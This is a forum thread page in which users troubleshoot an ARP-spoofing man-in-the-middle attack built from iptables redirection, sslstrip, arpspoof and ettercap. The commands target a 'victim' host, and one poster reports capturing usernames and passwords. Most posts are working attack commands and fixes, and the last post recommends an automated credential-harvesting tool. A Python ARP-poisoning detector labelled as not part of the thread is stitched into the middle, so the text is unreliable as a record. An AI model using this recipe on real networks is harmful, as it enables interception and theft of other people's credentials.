Page 2 of 3 (results 11 to 20 of 23)

Thread: Ettercap+Sslstrip

  1. #11
    Just burned his ISO
    Join Date: May 2011
    Posts: 2

    Re: Ettercap+Sslstrip

    This works perfect in BT5 and Ubuntu:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    sslstrip -a -l 8080
    ettercap -C

  2. #12
    Senior Member
    Join Date: Apr 2006
    Posts: 154

    Re: Ettercap+Sslstrip

    I'm stuck with ettercap... it won't catch anything... (but I can see everything inside log_ssl)

    Here's what I do:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    sslstrip -l 10000 -w log_ssl -p -a

    arpspoof -i eth0 -t 192.168.2.9 192.168.2.1 (192.168.2.9 is the victim, 192.168.2.1 is the router, and YES, they are correct!)

    ettercap -T -q -i eth0

    I've uncommented the 2 "if you use iptables..." in etter.conf.

    I can't get any data inside the window running ettercap, but if I "cat" the log of sslstrip I can see data.

    Any idea????

  3. #13
    maverik35 (Very good friend of the forum)
    Join Date: Sep 2009
    Location: Debian land
    Posts: 734

    Re: Ettercap+Sslstrip

    Quote (originally posted by michelinok, post #12 above)
    Michelinok, I'm afraid you are doing 2 things redundant, and I quote:
    1. You either forward traffic manually (like you just did: echo 1 > /proc/sys/net/ipv4/ip_forward) or
    this way: ettercap -T -q -i eth0...
    Please, I invite you to read the man ettercap: "If you use ettercap, automatically traffic is forwarded, and disable the forwarding from kernel
    (echo 1 > /proc/sys/net/ipv4/ip_forward) if it was done previously, like you did." Please, check it this way if you do not believe:
    * Forward traffic (from kernel) manually (echo 1 > /proc/sys/net/ipv4/ip_forward)
    * then type: cat /proc/sys/net/ipv4/ip_forward
    You will see "1", meaning you forwarded the traffic correctly.
    * Then type ettercap -T -q -i eth0
    * Open another Terminal:
    Recheck the forwarding by typing: cat /proc/sys/net/ipv4/ip_forward
    You will see "0"... Your forwarding was disabled, and now ettercap will forward for you...
    2. In sslstrip, you have some options by typing: sslstrip --help or -h
    -a Log all traffic (http and https).
    -p Log only SSL posts (default)
    -s Log only SSL to and from the server
    -l Port where it will be listening (default is 10000). So if you use 10000, you do not need to use the -l 10000, but you can use it if you wish, no harm.
    You are configuring sslstrip to log all traffic and SSL posts... at the end no harm is done, but one thing is for sure, we do not know the final result of using the 2 parameters since they do one thing: log SSL...
    What I mean by "not knowing the final result" is we do not know "exactly how sslstrip will behave under those circumstances"...
    So, if you are to use something, I invite you to read instructions before using it... Please, take this advice: do not use an instruction that someone posts or uses before knowing what it means and what it is being used for, and then apply it if you think it will help you...
    Best of luck.

  4. #14
    Senior Member
    Join Date: Apr 2006
    Posts: 154

    Re: Ettercap+Sslstrip

    Thank you, I'll try your suggestions asap.
    And yes... I believe
    I know for sure that ssl (with those parameters) and with my "wrong" setup works ok, I'm just trying with my laptop, and all the traffic is forwarded ok, ssl and normal http traffic, everything is transparent and works ok!
    I think the problem is the "double" forward (I'll check this night, I'm at work atm) and I'll let you know.
    Many thanks for the reply!

  5. #15
    Senior Member
    Join Date: Apr 2006
    Posts: 154

    Re: Ettercap+Sslstrip

    I've tried not echoing "1", but ettercap won't show anything; the traffic is forwarded well and I can see in the sslstrip's log the password, username, etc... (I'm testing with my laptop, and everything is ok).
    Maybe I'm missing something... but what?

  6. #16
    maverik35 (Very good friend of the forum)
    Join Date: Sep 2009
    Location: Debian land
    Posts: 734

    Re: Ettercap+Sslstrip

    Try to drop privs to the actual user:
    If it is set up as 65535 (nobody), try 0 (root) or try this:
    In the terminal type: xxx@bt> id
    It will give you your id info; in my case it is 1000:
    uid=1000 and gid=1000
    If you are root: xxx@bt#
    you will get uid=0 and gid=0

    So remember this: when you first run ettercap, you need privileges to be able to open link layer sockets, so you run ettercap as root (xxx@bt#). After loading ettercap, all privs are dropped to 65535 (nobody) or to the user you set up in etter.conf...
    Ettercap writes the log info in a directory with permissions, in this case, you... your id...
    Now I'll post the part of the ettercap manual which says so, and I quote:

    PRIVILEGES DROPPING
    ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privs are not needed anymore, so ettercap drops them to UID = 65535 (nobody). Since ettercap has to write (create) log files, it must be executed in a directory with the right permissions (e.g. /tmp/). If you want to drop privs to a different uid, you can export the environment variable EC_UID with the value of the uid you want to drop the privs to (e.g. export EC_UID=500) or set the correct parameter in the etter.conf file.

    Try this... May help... Just try to follow the ettercap manual... I've read it many, many times, day after day just to make it work; perhaps it won't work 100%, but I can assure you something: many, many doubts you had will be answered...
    Best of luck...

  7. #17
    Senior Member
    Join Date: Apr 2006
    Posts: 154

    Re: Ettercap+Sslstrip

    Hi Maverik35!
    Thanks for the suggestion... it did the trick for 50%...
    It works for https traffic (transparent and everything is ok!!!! finally!), but it's strange that it doesn't work for normal http pages...
    I've taken a look at the options of sslstrip, and I'm logging everything (ssl and http traffic, since I'm using this: sslstrip -a -k -f).
    It's strange because ettercap works ok and it's doing its "sniffing" correctly except for the http.
    Any idea?


    PS: Thanks for the above trick; it's strange because in bt4 I didn't have any problem using ettercap (of course, I never tried sslstrip)

  8. #18
    maverik35 (Very good friend of the forum)
    Join Date: Sep 2009
    Location: Debian land
    Posts: 734

    Re: Ettercap+Sslstrip

    Hi.. Try this to see if it helps:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port "port you want to redirect traffic to" -i "your iface"
    This parameter is to be used only with the chains PREROUTING, INPUT and FORWARD of the table nat.. The specification of the interface is to know the name of the interface via which a packet was received.. So maybe it might help.. Sometimes I use it.. So you are using the table "nat" and Appending ("-A") a new rule to the PREROUTING chain, which is -p tcp --destination-port 80.

    To see all the traffic, you can use the --write option in ettercap (example: --write my_traffic). It will create a my_traffic.pcap; read it with wireshark or use option -r in ettercap to read it once you stop the sniffing.
    Hope this helps... Best of luck.
    Last edited by maverik35; 06-16-2011 at 04:17 PM.

  9. #19
    Senior Member
    Join Date: Apr 2006
    Posts: 154

    Re: Ettercap+Sslstrip

    No way...
    I'm really stuck...

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 -i eth0
    arpspoof -i eth0 -t 192.168.2.9 192.168.2.1 (192.168.2.9 is the victim, 192.168.2.1 is the router, and YES, they are correct!)
    sslstrip -a -k -f
    ettercap -T -q -i eth0

    Sometimes I get some info on ettercap, sometimes not... maybe my router is not so simple to ARP poison?
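An added example, not from this thread, showing the defender's view of the arpspoof step discussed above: on the victim host, the poisoning appears as the router's MAC changing between ARP cache snapshots and as one MAC being claimed by two IPs. The snapshots are constructed in /proc/net/arp column format and every address in them is a sample value.

```python
"""Victim-side detection of the ARP poisoning step (arpspoof -t victim router).

Added example, not from this thread: the attack rewrites the victim's ARP entry
for the router, so on the victim the symptom is the gateway MAC changing between
cache snapshots and one MAC appearing under two IPs. Snapshots below are
constructed in /proc/net/arp column format; all addresses are sample values.
"""

GATEWAY_IP = "192.168.2.1"  # router address used in the thread

# Constructed snapshots of /proc/net/arp taken a few seconds apart.
SNAPSHOT_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.2.1      0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.2.20     0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
"""
SNAPSHOT_AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.2.1      0x1         0x2         AA:BB:CC:DD:EE:01     *        eth0
192.168.2.20     0x1         0x2         aa:bb:cc:dd:ee:01     *        eth0
"""

def parse_arp_table(text):
    """Return {ip: mac} for complete entries (flag 0x2), skipping the header line."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[2] == "0x2":
            table[fields[0]] = fields[3].lower()  # normalise case before comparing
    return table

def gateway_mac_changes(snapshots, gateway_ip=GATEWAY_IP):
    """Compare consecutive snapshots; return (index, old_mac, new_mac) per change."""
    changes, previous = [], None
    for i, snap in enumerate(snapshots):
        mac = parse_arp_table(snap).get(gateway_ip)
        if mac is None:  # entry expired or incomplete: nothing to compare against
            continue
        if previous is not None and mac != previous:
            changes.append((i, previous, mac))
        previous = mac
    return changes

def duplicate_macs(text):
    """Return {mac: [ips]} for MACs claimed by more than one IP in one snapshot."""
    by_mac = {}
    for ip, mac in parse_arp_table(text).items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}
```

On a live host the same functions can be fed the contents of /proc/net/arp read at an interval; a gateway MAC change or a duplicate MAC is the signal to investigate.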

  10. #20
    Senior Member
    Join Date: Dec 2010
    Posts: 127

    Re: Ettercap+Sslstrip

    Or you can just run easy-creds and not have to worry about any of this....

    Do a Google search for easy-creds and you're good to go.

    Easy-creds is now in the BT5 repos. Just apt-get install easy-creds

    Then you're good to go.
    Last edited by ericmilam; 11-20-2011 at 01:45 AM.
